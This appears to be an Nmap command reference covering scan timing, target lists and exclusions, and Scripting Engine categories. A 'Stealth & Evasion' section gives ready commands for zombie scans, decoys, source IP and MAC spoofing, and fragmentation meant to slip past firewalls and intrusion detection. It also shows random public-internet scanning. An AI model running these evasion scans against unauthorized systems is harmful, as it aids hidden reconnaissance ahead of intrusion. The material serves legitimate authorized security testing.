# command format showing performance options nmap --min-rate [target] nmap --max-rate [target] nmap --max-retries [target] nmap --host-timeout [target] nmap --scan-delay [target] # real examples # force minimum 100 packets/second nmap --min-rate 100 192.168.1.0/24 # limit to 10 packets/second for polite scanning nmap --max-rate 10 192.168.1.1 # only retry each probe once nmap --max-retries 1 192.168.1.0/24 # skip hosts that take longer than 5 minutes nmap --host-timeout 5m 192.168.1.0/24 # wait 1 second between probes for stealthy scanning nmap --scan-delay 1s 192.168.1.1 # don’t let delay exceed 2 seconds nmap --max-scan-delay 2s 192.168.1.1 # combine multiple performance options nmap --min-rate 50 --max-retries 2 --host-timeout 10m 10.0.0.0/16
Target Specification
Specifies which systems the scan will include or exclude by listing individual hosts, CIDR ranges, IP ranges, hostnames, or input/exclusion files.
Use this to precisely define the scope of a scan run so probes and options apply only to authorized and intended targets.
-iR : Scan a number of random public IPv4 addresses; use 0 for endless scanning (research only with authorization).
-sL : List scan; resolve names and print the expanded target list without sending probes.
-r : Do not randomize host order; scan in the order provided.
-6 : Force IPv6 mode and resolve IPv6 addresses.
--resume : Resume a previously interrupted scan using a saved output file.
# Generic format nmap [target-specs] [port-specs] [other-options] # scan a single IP nmap 192.168.1.1 # scan a hostname that resolves to an IP nmap scanme.nmap.org # scan every host in a /24 network nmap 10.0.0.0/24 # scan a range of IPs from .1 through .100 nmap 192.168.1.1-100 # probe 100 random public IPv4 addresses (research only) nmap -iR 100 # show the expanded target list without sending packets nmap -sL 192.168.1.0/24 # scan an IPv6 address explicitly nmap -6 2001:db8::1 # resume a previously interrupted run from a saved output file nmap --resume savefile.gnmap
Target Input From File
-iL - The Nmap -iL input file is a plain-text file containing target specifications (one or more per line) that Nmap reads instead of taking hosts directly from the command line.
The file is only for target specifications (IPs, hostnames, CIDR blocks, ranges, etc.). Ports must be specified on the Nmap command line,
Each entry can be any target format Nmap supports on the command line:
Single IP address
Hostname
CIDR notation
IPv6 address or range
Octet ranges
Separation
Entries on the same line must be separated by one or more spaces, tabs, or newlines. A newline simply continues to the next line of input.
Comments
Any text starting with # is treated as a comment and ignored until the end of the line.
Blank lines are ignored. Invalid entries are skipped with a warning. This format works well for scanning large lists from DHCP exports, firewall rules, or custom scripts.
Example Input File (targets.txt)
# Single IP address - one specific host 192.168.1.177 # Hostname - resolvable domain name scanme.nmap.org # CIDR notation - block of IPs using subnet mask 192.168.1.0/24 # IPv6 address - single IPv6 host 2001:db8::1 # IPv6 CIDR range - block of IPv6 addresses 2001:db8::/64 # Octet ranges - flexible IP range across any octet 192.168.1-5.1-254
Running the Scan
Run your scan with the input from your file.
# Basic command use nmap -iL targets.txt # Command with more flags set nmap -sS -T5 -iL targets.txt -p 80
Target Exclusions
Skip specific hosts or networks so they are never probed even if they appear in the target set; use exclusions to enforce scope and avoid sensitive systems.
Exclusions accept single IPs, hostnames, CIDRs, and ranges and can be provided directly or via a file for auditability.
--exclude : Skip the specified comma separated list of hosts, IPs, or networks.
--excludefile : Read exclusions from a file, one entry per line; supports CIDR, single IPs, and hostnames.
# Generic format nmap [targets] --exclude [host1,host2,...] --excludefile [file] # scan a subnet but skip the router and server by IP nmap 192.168.1.0/24 --exclude 192.168.1.1,192.168.1.10 # scan targets from file but skip hosts in exclude.txt nmap -iL targets.txt --excludefile exclude.txt # exclude an entire CIDR while scanning a larger CIDR nmap 10.0.0.0/16 --exclude 10.0.1.0/24 # combine direct targets with exclusions nmap 203.0.113.0/24 --exclude 203.0.113.5,203.0.113.10
Stealth & Evasion Techniques
Before employing evasion techniques, first identify the presence of firewalls, IDS/IPS systems, and other security monitoring. Look for these indicators during initial reconnaissance:
Firewall Detection Signs
admin prohibited filter - Explicit ICMP rejections indicating active firewall rules
Consistently filtered ports - Multiple ports showing no response across scans
Inconsistent port states - Different results between SYN, ACK, and NULL scans
ICMP rate limiting - Delayed or blocked ICMP error messages
TTL variations - Inconsistent time-to-live values in responses
Initial Detection Scans
# Basic port state analysis nmap -sS -v --reason # ACK scan for stateful firewall mapping nmap -sA -v # NULL/FIN/Xmas scans for rulebase analysis nmap -sN -sF -sX -v
Evasion Techniques
Once security controls are identified, use these techniques to avoid detection by firewalls, IDS/IPS systems, and security monitoring.
These methods help bypass security controls or obscure scan origins by manipulating packet attributes, timing, and source information.
Use stealth options when authorized testing requires evading detection systems, but be aware that aggressive evasion may violate scope or trigger alerts.
Scan Origination & Attribution
-sI : Idle (zombie) scan. Uses a third-party host with predictable IP ID sequences to probe targets indirectly. The scanner’s IP never appears in target logs, making this extremely stealthy. IP ID is the Identification field in IP packets used for fragment reassembly. Requires finding a zombie host with predictable IP ID behavior - test with nmap -p 80 --script ipidseq . Look for “Incremental” (number increases by 1 per packet, ideal) or “All zeros”. Avoid “Random” IP ID sequences.
-D : Cloak scan among decoys. Makes it appear that multiple hosts are scanning the target simultaneously. Use ME to specify your real IP’s position in the decoy list, or let Nmap randomize it. Use RND to generate random decoy IPs.
-S : Spoof source IP address. Makes packets appear to originate from a different IP. Requires raw packet privileges and won’t receive responses unless you can intercept return traffic. Primarily useful for testing firewall rules.
--source-port or -g : Spoof source port number. Some firewalls allow traffic from specific source ports (like 53 for DNS or 20 for FTP-data). Can help bypass poorly configured firewalls.
-e : Specify network interface to use for sending packets. Useful when you have multiple network interfaces and need to control which one is used for scanning.
--spoof-mac : Spoof MAC address using a specific address, vendor prefix, or random value (0). Only works on local Ethernet networks. Use to bypass MAC-based filtering or attribution.
Packet Manipulation
-f : Fragment packets. Splits TCP headers across multiple small IP fragments to evade packet filters and IDS systems that don’t reassemble fragments. Can bypass simple filters but modern systems often detect this.
--mtu : Set custom Maximum Transmission Unit size for packet fragmentation. Must be a multiple of 8. Allows finer control than -f for evading specific MTU-based filters.
--data-length : Append random data to packets to reach a specific size. Changes packet fingerprint to evade signature-based detection systems that match specific packet sizes.
--badsum : Send packets with invalid TCP/UDP checksums. Legitimate systems discard these, but some firewalls and IDS may process them incorrectly, revealing their presence or forwarding behavior.
Timing & Behavior
--randomize-hosts : Scan targets in random order rather than sequentially. Makes scan pattern less obvious and distributes load across target network.
--scan-delay & --max-rate : Control packet timing to avoid threshold-based detection:
# Slow, stealthy scanning nmap --scan-delay 5s --max-rate 10 # Ultra-slow timing template nmap -T paranoid
Practical Examples
# Idle (zombie) scan using a third-party host # Test zombie first: nmap -p 80 --script ipidseq sudo nmap -sI # Fragment packets to evade simple packet filters sudo nmap -f # Custom MTU fragmentation (must be multiple of 8) sudo nmap --mtu 16 # Cloak scan among decoy addresses nmap -D decoy1,decoy2,ME,decoy3 # Generate 5 random decoy IPs, Nmap chooses your position nmap -D RND:5 # Generate 10 random decoys with your IP in position 3 nmap -D RND:5,ME,RND:5 # Spoof source IP (won’t receive responses) sudo nmap -S -e eth0 -Pn # Use specific source port to bypass firewall nmap --source-port 53 # Append random data to packets nmap --data-length 50 # Scan in random order nmap --randomize-hosts # Spoof MAC address sudo nmap --spoof-mac 0 # Send invalid checksums to detect middleboxes nmap --badsum # Combined stealth approach nmap -sS -f --data-length 64 --source-port 53 --scan-delay 2s --max-rate 5
Nmap Scripts
The Nmap Scripting Engine (NSE) allows users to write and run scripts for network discovery, vulnerability detection, and advanced scanning techniques.
NSE scripts are written in Lua and extend Nmap’s capabilities.
Script Categories:
auth - Authentication-related scripts (credential testing, brute force)
broadcast - Network-wide discovery via broadcast/multicast
brute - Brute-force password guessing against services
default - Safe, useful scripts run with -sC (recommended for most scans)
discovery - Network and service discovery/enumeration
dos - Scripts that may cause denial of service (use with extreme caution)
exploit - Attempts to actively exploit vulnerabilities
external - Sends data to third-party services (privacy implications)
fuzzer - Sends randomized data to test for crashes
intrusive - Likely to crash services or consume significant resources
malware - Detects malware, backdoors, or compromised systems
safe - Unlikely to crash services or trigger alerts
version - Enhanced version detection beyond Nmap’s built-in -sV
vuln - Checks for specific security vulnerabilities
To see detailed descriptions of all Nmap scripts, visit the official documentation.
View Script Info
# View Info for All Scripts nmap --script-help all # View Info for Specific Scripts nmap --script-help